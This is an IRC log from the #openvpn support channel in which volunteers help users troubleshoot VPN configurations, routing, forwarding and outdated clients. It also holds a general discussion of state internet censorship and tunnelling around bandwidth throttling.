EugeneKay: do you know much about long range wifi networks? 23:18 < roboman2444> so EugeneKay care to ... re-say how to static compile? 23:19 < EugeneKay> Not really 23:20 < roboman2444> ...pleeeease? 23:21 < roboman2444> just a hint then? 23:21 < EugeneKay> https://www.google.com/search?q=openvpn+compile+static 23:21 <@vpnHelper> Title: openvpn compile static - Google Search (at www.google.com) 23:22 < roboman2444> yea 23:22 < roboman2444> all those links are purple 23:22 < EugeneKay> Try #openvpn-devel 23:22 < roboman2444> k 23:25 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Quit: emmanuelux] --- Day changed Sun Feb 24 2013 00:46 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Quit: Leaving] 02:56 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 03:24 -!- Orbi [~opera@109.129.1.126] has joined #openvpn 03:38 -!- Orbi [~opera@109.129.1.126] has left #openvpn [] 03:38 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 03:43 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 264 seconds] 03:46 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 03:51 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 264 seconds] 04:08 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 04:10 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 04:14 -!- athetius [~sollux@athetius.com] has joined #openvpn 04:24 < athetius> ios OpenVPN app is unable to connect to openvpn. The error is: EVENT: CORE_ERROR connect: No route to host [ERR]. Connection works with the same config but with a Linux laptop (on the same network), will post configs once pastebin comes back up. 04:27 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:31 < athetius> server.conf: http://pastie.org/6327242 04:34 < athetius> client.ovpn: http://pastie.org/6327249 04:36 < athetius> /etc/rc.local (on server): http://pastie.org/6327260 04:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:47 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 04:53 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:11 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Ping timeout: 248 seconds] 05:14 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:33 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Ping timeout: 248 seconds] 05:37 < pppingme> athetius from the client, can you ping the server? 05:37 < pppingme> oh, just saw your fw rules, you don't seem to allow for pings, bad bad bad... makes troubleshooting harder 05:40 -!- APTX [APTX@unaffiliated/aptx] has quit [Ping timeout: 276 seconds] 05:42 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 05:46 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 06:02 -!- JSharpe [~JSharpe@37.220.15.234] has joined #openvpn 06:37 -!- dsii [allan@hijacked.us] has left #openvpn [] 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:04 -!- p3rror [~mezgani@41.249.131.248] has joined #openvpn 07:04 -!- master_of_master [~master_of@p57B52F92.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 07:06 -!- master_of_master [~master_of@p57B525AE.dip.t-dialin.net] has joined #openvpn 07:11 -!- stereoit79 [~stereo@ip-78-45-42-209.net.upcbroadband.cz] has joined #openvpn 07:12 < stereoit79> hello, how do I generate server certiifcate request (with the nsCertType=server) to be signed by another CA? 07:15 -!- Teck7__ [~teck7@70.50.155.78] has joined #openvpn 07:18 -!- Teck7 [~teck7@bas1-montreal54-1279376358.dsl.bell.ca] has quit [Ping timeout: 256 seconds] 07:37 < dvl> stereoit79: perhaps this will help: http://www.freebsddiary.org/bacula-tls.php 07:37 -!- stereoit79 [~stereo@ip-78-45-42-209.net.upcbroadband.cz] has quit [Read error: Connection reset by peer] 07:37 <@vpnHelper> Title: The FreeBSD Diary -- Bacula - Transport Layer Security (TLS) (at www.freebsddiary.org) 07:38 < dvl> But? ummm, perhaps not. 07:39 < dvl> I've been using ssladmin for this. https://dan.langille.org/2013/01/03/ssl-admin/ 07:42 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 07:42 -!- mode/#openvpn [+v s7r] by ChanServ 08:20 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 276 seconds] 09:11 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 09:12 -!- meepmeep [~meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 252 seconds] 09:17 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds] 09:22 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 09:32 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 09:33 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 09:35 < Suterusu> Hi, How do I diagnose: Sun Feb 24 08:44:55 2013 us=367163 CBD-Orthus/81.152.141.152:35234 MULTI: bad source address from client [192.168.1.113], packet dropped -=- 'cause I've suddenly started to get a lot of them, Resulting in me being disconnected from my VPN 09:36 < Suterusu> Also, How does one set the VPN to connect automatically on disconnection - I've 'connect automatically' ticked in my network manager, doesn't appear to do the trick. Also, How do I ensure my network is piped through my VPN - ie: if it isn't going through the VPN, it doesn't leave this machine. 09:36 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 09:37 -!- meepmeep [meepmeep@212.24.104.229] has joined #openvpn 09:38 < pekster> Suterusu: Network manages tends to do lots of things poorly, and the general recommendation is not to use it 09:38 < pekster> !keepalive 09:38 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 09:38 < pekster> And for redirection: 09:39 < pekster> !redirect 09:39 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 09:39 <@vpnHelper> http://ircpimps.org/redirect.png 09:39 < pekster> As for preventing non-VPN traffic going out, you'll need to write some firewall rules for that 09:39 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 09:41 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 09:54 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 09:55 < Suterusu> 'cause that is getting annoying 09:58 < pekster> Suterusu: OpenVPN drops traffic not associated with the IP (tun) or MAC (tap) of traffic it receives from the peer. Stop your client from sending that traffic, or if you intend to route a client-side LAN, you must use an iroute so the server is aware of the additional network 09:59 < pekster> tcpdump on the client-side on the VPN adapter and it should be very obvious what the bad traffic is. Then go fix it 10:01 < Suterusu> k, give it a shot - I'm not aware o anything 'additional' or 'new' tho 10:02 < Suterusu> hah - tcpdump: no suitable device found 10:02 < Suterusu> Love it when things 'just work' 10:02 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:03 < Suterusu> I takes it I does this on tun0 ? 10:14 < pekster> Yup. 'tcpdump -pni tun0' will show you all traffic on that device 10:14 < pekster> If the bad source address is consistent, you can dump on that, or dump with the filter "not host $actual_vpn_host" (set that to your VPN IP, of course) 10:15 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 10:16 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 10:20 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 10:23 < Suterusu> hmm, I just '-i' - whats the 'pn' aboot? The 'bad addy' seems consitent, yeah, And occurs in large blocks, mebbe 20-100 packets atta time 10:24 < Suterusu> ahh - yay manpages 10:24 < pekster> Indeed. You should always invoke tcpdump with -p unless you *actually* want to put the interface in promisc mode (if you don't understand that, you don't want it) 10:24 < Suterusu> hmm, don't see no lowercase p in there - whats tht? 10:24 < pekster> -pni is the same as -p -n -i 10:24 < pekster> getopts 10:25 < pekster> It's there. Use the slash key to search manpages (assuming your pager is less) 10:27 < Suterusu> hehe, That just highlighted every 'p' in the text... So the filter would be: "not host $10.8.0.6" - inc qoutes? 10:34 < pekster> No quotes 10:34 < pekster> tcpdump -pni tun not host 10.8.0.6 10:35 < pekster> The $ is a variable declaration in most shells. By using it I mean "replace $foo with your real-world usage here) 10:35 < pekster> And try search the manpage for the string -p 10:35 < pekster> Not just "p" 10:35 < DougEFresh> !tcp 10:35 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 10:35 < pekster> tun0 10:43 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 10:44 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 10:59 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 11:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 11:05 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 11:10 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 11:10 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 11:10 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:10 -!- mode/#openvpn [+o krzee] by ChanServ 11:15 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Quit: Leaving] 11:19 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:20 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 11:25 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 11:26 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 11:28 <@ecrist> dvl: I always loving coming out there, but we've got lots going on at $work right now 11:30 <+s7r> i have a friend in Iran and the govt. there implemented at country level some kind of filter to throttle bandwidth. if they see traffic is high they reduce bandwidth from 1mbps to 64kbps making browsing impossible. 11:30 <+s7r> any way out for this? 11:31 <+s7r> openvpn, PPTP, SSTP, L2TP don't help ... not even tor 11:31 <@ecrist> no 11:31 < kisom> No. 11:32 <@ecrist> if they're monitoring bandwidth usage, that's not going to change regardless of vpn 11:34 <@krzee> you could play with multiple connections, for example what happens if you use a torrent without letting any single connection use too much bandwidth 11:35 <@krzee> of course, if that works i dont know anything to let you take advantage… 11:35 < kisom> He's gonna get his door busted by the cops if he starts torrenting in iran :) 11:35 <+s7r> i was thinking 11:35 <@krzee> theres legal torrents 11:35 <+s7r> maybe they throttle only tcp and udp .. i was thinking to make an ICMP tunnel 11:35 <+s7r> it's just a thought 11:36 < kisom> s7r: As already mentioned, they probably only count the number of packets regardless of the protocol. 11:36 < kisom> Hence it most likly wont work. 11:36 <@krzee> agreed, but may as well test 11:36 <+s7r> yeah... since it's something implemented at country level i doubt they didn't think about ICMP :) 11:36 <+s7r> but yeah, a test is worth it 11:37 <+s7r> last year they used deep package inspection to throttle all SSL connections (openvpn, https, ssh, esmtp, everything which uses ssl) 11:37 <+s7r> but you could bypass that uing obfsproxy and tor 11:37 <+s7r> obfsproxy makes ssl encrypted traffic look like innocent traffic 11:37 < pekster> You can do all sorts of crazy tunnels; IP over ICMP, or over DNS, etc, etc. However, openvpn encapsulates at thte UDP (or tcp, if using it) level. It doesn't care "how" you get that UDP data to your peer 11:38 < pekster> Openvpn will even work over RFC2549. I don't recommend it, however 11:40 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:42 <+s7r> i know .. but maybe they only filter tcp and udp packets... not icmp 11:42 <+s7r> if they filter all packets... is there any way out of this ? 11:43 < pekster> Satellite. Or my referenced carrier pigin protocol ;) 11:43 <@krzee> lol 11:43 < pekster> state-level censorship sucks 11:43 < kisom> Short wave radio 11:43 < kisom> ;) 11:43 <@krzee> or of course you could check what i said 11:44 <@krzee> and then if it helps, you could create a new type of proxy, lol 11:44 < pekster> They've got standards for exotic things like IP over DNS requests 11:44 < pekster> It's very non-trivial to set up and requires control of a domain you have access to DNS setup for (particularly for NS deligation) but it's a cool idea. Not great overhead/throughput, but it's still nifty 11:45 <@krzee> [13:34] you could play with multiple connections, for example what happens if you use a torrent without letting any single connection use too much bandwidth 11:45 <@krzee> [13:35] of course, if that works i dont know anything to let you take advantage… 11:46 < pekster> Yes, I saw that. I was answer the question about "all packets" 11:46 < dvl> ecrist: $work is very important. It allows $play. 11:46 <@krzee> boats and hoes also allow for his $play 11:46 <@krzee> :D 11:47 <@krzee> !ecrist 11:47 <@krzee> aww 11:49 <@krzee> !learn ecrist as http://www.youtube.com/watch?v=0Veqz8W98iA 11:49 <@vpnHelper> Joo got it. 11:52 <+s7r> krzee: that solution is not practical for average home users 11:52 <+s7r> they have a single connection 11:52 <@krzee> then there is no possible solution 11:52 <@krzee> i was reaching anyways 11:53 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has joined #openvpn 11:53 <@ecrist> krzee: :D 11:54 <+s7r> too bad 11:54 <+s7r> :) 11:54 <+s7r> the only solution there is to take down that state system 11:55 <+s7r> how can a normal country censorship internet? internet is knowledge and fast communications at global level, for news, for sharing information 11:55 <+s7r> naturally there are some bad things also on the internet but the good things prevail over the bad ones 11:55 <@krzee> they dont care about the "bad things" 11:55 <@krzee> they care about threats to the state 11:55 < pekster> Dictatorships have never liked free access to information. They'd rather censor things en-mass to stop that 11:55 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 11:56 <+s7r> yes they like to keep the population dumb 11:56 <@krzee> by dictatorship you mean strong states, right? 11:56 <+s7r> they don't want them to learn how other countries live 11:56 < pekster> Internet is just the next version of controlling the press, books, radio, etc 11:57 <@krzee> for example, china is not a dictatorship, but is a great example of a state which censors in masse 11:57 < uberushaximus> why censor when you can flood the people's minds with the irrelevant? 11:57 <@krzee> i make the distinction because america is a strong state which is trying to enact laws that will allow censorship, and i feel its important we dont give off the vibe that "it cant happen here" 11:58 <+s7r> yes you are right it's the next version of controlling the media but people already learned about it and know it should be left free 11:58 <+s7r> and they come out in the street everytime there's a threat 11:59 <@krzee> cispa is going through another attempt 11:59 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 11:59 < uberushaximus> six strikes is starting tomorrow 12:00 <@krzee> 6 strikes? 12:00 <@krzee> that's half a perfect game! 12:02 -!- Devastator [~devas@177.18.196.4] has joined #openvpn 12:03 -!- Devastator [~devas@177.18.196.4] has quit [Changing host] 12:03 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 12:08 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has quit [Ping timeout: 260 seconds] 12:10 < pekster> Sure, replace "dictatorship" with "opressive regime" if you'd like 12:11 < pekster> Things like 6-strikes is different as it's not state-level; it's cooperation between private ISPs and private interest groups. And ultimately, the prople the {MP,RI}AA are going after in fact breaking US copyright law. I'm not going to argue over if that's "right" or not as ##Politics is more appropriate for that ;) 12:12 < pekster> On a side note, I'm waiting for all these new "VPN" and "seedbox" useres to find themselves in sore lack of protection when warrants, pen-trace, and subpoenas are issued to US or "friendly" juristictions to un-mask people hiding behind what is effectively a glorified proxy 12:13 < pekster> The term "annonymous VPN" cracks me up every time since VPNs are the exact opposite of annonymous; they go through great lengths, in fact, to cryptographically verify the identity of the remote end 12:24 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 276 seconds] 12:25 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 12:26 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 256 seconds] 12:26 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 12:29 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 12:30 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 12:38 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 12:42 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 12:50 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn 12:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:01 < neilhwatson> I trying to set up a bridged tunnel. Following the redirect flowchart I'm led to 'is NAT enabled on VPN subnet'. The trouble is I'm not using NAT. Both client and server have public IP's. The server is assigning a public IP to the client. What could the problem be? 13:02 < neilhwatson> configs: https://gist.github.com/neilhwatson/5025038 13:02 <@vpnHelper> Title: openvpn configs (at gist.github.com) 13:04 < pekster> You can't use the same IP for the pool range as you do for your server 13:04 < pekster> Line 32 in that paste 13:05 < neilhwatson> Sorry, that was a typo in the gist, not the real configs. Corrected. 13:07 < pekster> So where are you running into problems? That setup looks fine 13:07 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 13:09 < neilhwatson> When the tunnel is up, I can ping the server from the client. I can't ping 8.8.8.8 from the client. Ip_forwarding is enabled on the server (net.ipv4.conf.eth0.forwarding = 1, net.ipv4.conf.br0.forwarding = 1, and net.ipv4.conf.tap0.forwarding = 1). 13:15 < neilhwatson> Does is matter that the server IP and the IP assigned to the client are within the same subnet? I see a warning about that in the client log. 13:17 < pekster> YOu need sysctl net.ipv4.ip_forward 13:17 < pekster> Not just for the specific intefaces 13:17 < neilhwatson> net.ipv4.ip_forward = 1 13:17 < pekster> And you can safely ignore that warning 13:18 < pekster> So, you can ping the server; that's good and expected. tcpdump to see where the forward traffic gets lost 13:18 < pekster> I'm guessing a firewall issue on the server 13:18 < pekster> ie: server probably sees the client request come in on tap0, but not out the external iface 13:18 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 13:18 < pekster> Remember too that tcpdump hooks before the netfilter stack, so you can "see" traffic you later drop (for inbound packets) 13:19 < pekster> For output, if you see it in tcpdump it'll be on the wire, assuming no hardware/NIC issues 13:19 < neilhwatson> I cleared both firewalls (shorewall clear) but the problem persisted. I'll try the dump though unless you have another idea. 13:20 < pekster> I don't use shorewall so I can't comment. Put netfilter rules somewhere if you want me to look at them, in 'iptables-save -c' syntax 13:28 < neilhwatson> I did tcpdump -i tap0 on the server, cleared ip tables, started the tunnel and pinged 8.8.8.8 from the client. The dump shows only arp requests over and over: 13:28 < neilhwatson> 14:25:21.405332 ARP, Request who-has server.example.com tell client.example.com, length 28 13:28 < neilhwatson> 14:25:21.405339 ARP, Reply server.example.com is-at 00:16:36:6f:ff:14 (oui Unknown), length 28 13:28 < pekster> Then the request isn't even getting to the server 13:28 < pekster> Client routing or fw issue it would appear 13:29 < neilhwatson> dump tap0 on client then. 13:29 < pekster> I assume the tcpdump properly shows the pings that are working? 13:29 < pekster> Yea, you can work backwards to the client, that's a good idea 13:29 < pekster> Make sure the client is actually sending it; the server shouldn't drop traffic on a tunnel that's up that the client sends without a note in the log 13:33 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Ping timeout: 245 seconds] 13:35 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn 13:36 < neilhwatson> that was odd. I did not see any traffic on the client's tap0. 13:38 < pekster> Linux on the client? 'ip route get 8.8.8.8' 13:39 < pekster> If it's not the route, it could still be a client-side firewll 13:40 < neilhwatson> 8.8.8.8 via dev tap0 src 13:40 < neilhwatson> Linux client. 13:42 < neilhwatson> iptables clear: https://gist.github.com/neilhwatson/5025038 13:42 <@vpnHelper> Title: openvpn configs (at gist.github.com) 13:44 < neilhwatson> Correct, I do see some traffic, but not the ping. I see the same arp requests and 14:42:52.696532 STP 802.1w, Rapid STP, Flags [Learn, Forward], bridge-id 8000.00:d0:00:71:a9:97.81a4, length 42 13:45 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 13:51 < Devastator> !howto 13:51 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 13:53 < Devastator> this friggin isp, I can't even open howto links 13:53 < pekster> tor, or proxy, or use openvpn to redirect yourself to a host you control 13:54 < pekster> neilhwatson: Even the ping to the server's IP? 13:54 < pekster> Or just not seeing the 8.8.8.8 ping? 13:55 < pekster> If you're connected to the VPN, openvpn will deliver anything sent into tap0 on one side to tap0 on the other, barring a firewall preventing it or network error beweten you dropping the traffic 13:56 < pekster> neilhwatson: If that's the server's netfilter ruleset, it looks fine. net.ipv4.ip_forward =1, so that's good. Have you checked the client firewall? Done the same for client routing table making sure it actually got/applied the two /1 routes for the def1 redirect? Maybe tcpdump the physical interface if you don't see it on tap0 to see if it's routing it wrongly? 13:56 < pekster> Checked client logs for errors applying the routes? 13:59 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:02 -!- meepmeep [meepmeep@212.24.104.229] has quit [Read error: Operation timed out] 14:04 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 14:04 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 14:04 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 14:05 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 14:09 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 260 seconds] 14:09 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 14:11 < Devastator> openvpn.net is 67.228.116.150? 14:11 < pekster> Yup, that's the only A record 14:12 < Martin`> there are also 2 mx recors 14:12 < Devastator> time to reconnect again, gotta love my isp and/or level3/gblx 14:12 < Devastator> brb 14:13 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 14:13 < Martin`> good luck 14:15 -!- Devastator- [~devas@186.214.110.44] has joined #openvpn 14:15 -!- Devastator- [~devas@186.214.110.44] has quit [Changing host] 14:15 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 14:16 < Devastator-> yep, now it works.. 14:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 14:18 -!- Devastator- is now known as Devastator 14:18 < Devastator> "local" conf parameter is not what I thought it was.. 14:20 < pekster> Manpage unclear on that point? "Local host name or IP address for bind. If specified, OpenVPN will bind to this address only. If unspecified, OpenVPN will bind to all interfaces." 14:20 < Devastator> no, not at all 14:21 < Devastator> I'm thinking my approach 14:23 < Devastator> maybe if I create a bridge and put both wan interfaces there... hum, does local accepts interfaces instead of address? 14:24 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:25 < Devastator> nevermind, I guess it's not good to bind openvpn to public addresses directly 14:25 < pekster> No. It makes a call to the system bind() function which binds to address, never to interfaces 14:26 < Devastator> got it 14:32 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 14:34 < DougEFresh> wat 14:44 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 14:47 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Ping timeout: 252 seconds] 14:53 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:54 -!- max_ [~max@98.225.19.83] has joined #openvpn 15:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 15:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 15:01 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 15:02 < DougEFresh> what up dogs 15:03 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 15:06 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 15:14 -!- combat7331 [~Mamba@d54C65431.access.telenet.be] has joined #openvpn 15:14 < combat7331> Hello 15:14 < combat7331> I'm trying to connect to a VPN server on my linux box 15:14 < combat7331> It's running on OpenCZ 15:14 < combat7331> VZ* 15:15 < combat7331> but it seems that no traffic is passed through the tun interface 15:16 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 15:16 < pekster> !openvz 15:16 <@vpnHelper> "openvz" is (#1) http://wiki.openvz.org/VPN_via_the_TUN/TAP_device to learn bout openvz specific stuff with regards to openvpn or (#2) It is usually less painful to switch to a host with better virtualization technology, eg Xen. 15:16 < combat7331> TUN works on my OpenVZ 15:16 < combat7331> I just can't connect to a OpenVPN server 15:17 < combat7331> http://pastebin.com/VFm5UFYs 15:17 < combat7331> is the log of the client 15:18 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 15:18 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 15:18 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:18 -!- mode/#openvpn [+o krzee] by ChanServ 15:20 < pekster> Update your client 15:20 < pekster> 2.0.9 can't handle the toplogy push 15:20 < pekster> !download 15:20 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 15:20 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 15:20 < pekster> Your client version is over 7 years old 15:20 < combat7331> yum ... 15:20 <@krzee> !repo 15:20 <@vpnHelper> "repo" is openvpn runs some software repositories for your installing pleasure, http://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 15:21 < combat7331> 2.2.2 would do? 15:21 <@krzee> yep 15:21 < combat7331> ok, will get it from epel 15:22 -!- corretico [~luis@190.211.93.38] has joined #openvpn 15:22 -!- corretico_ [~luis@190.211.93.38] has joined #openvpn 15:22 -!- corretico [~luis@190.211.93.38] has quit [Client Quit] 15:22 -!- corretico_ [~luis@190.211.93.38] has quit [Client Quit] 15:22 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 15:22 -!- corretico [~luis@190.211.93.38] has joined #openvpn 15:22 < EugeneKay> What still has 2.0.9? CentOS 5? 15:22 < combat7331> yes 15:23 < combat7331> i think i got it from the atomic repo 15:23 < EugeneKay> Yeah, time to upgrade to 6 :-p 15:23 < combat7331> too much ram >.< 15:23 < combat7331> i like saving the 10MB ;p 15:24 < EugeneKay> .....perhaps Gentoo is a better fit for you? http://funroll-loops.info/ 15:24 <@vpnHelper> Title: Welcome to Gentoo is Rice, the Volume goes to 11 here. (at funroll-loops.info) 15:24 < combat7331> used to centos :) 15:25 < combat7331> i just got so many files on this box 15:25 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 15:25 < combat7331> and its running on 16gb ram anyways 15:25 < EugeneKay> If you're squabbling about 10MB of RAM in an era where phones have 2GB.... yeah. 15:26 < combat7331> low end boxes for the win 15:26 < EugeneKay> My smallest VM has 512MB, and it runs MySQL, Apache, PHP-FPM, Postfix, and ZNC just fine 15:26 < combat7331> OS? 15:26 < EugeneKay> Scientific Linux 6 15:27 < combat7331> mine is 128MB 15:27 < combat7331> and runs CentOS 5 x86 15:27 < EugeneKay> You poor git 15:27 < combat7331> my biggest one has 32GB RAM and I use to run OpenVZ VPS's on it 15:28 < combat7331> But yea CentOS 6 would do good 15:31 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:34 < combat7331> hello pekster? it doesn't seem to be connected 15:35 < combat7331> http://pastebin.com/KYV0Vzg9 15:43 < combat7331> Does anyone have an idea? 15:46 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 15:47 <@krzee> you seriously using 1.2.3.0/24? 15:47 < combat7331> why not 15:47 <@krzee> !1918 15:47 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 15:47 < combat7331> easy to remember :p 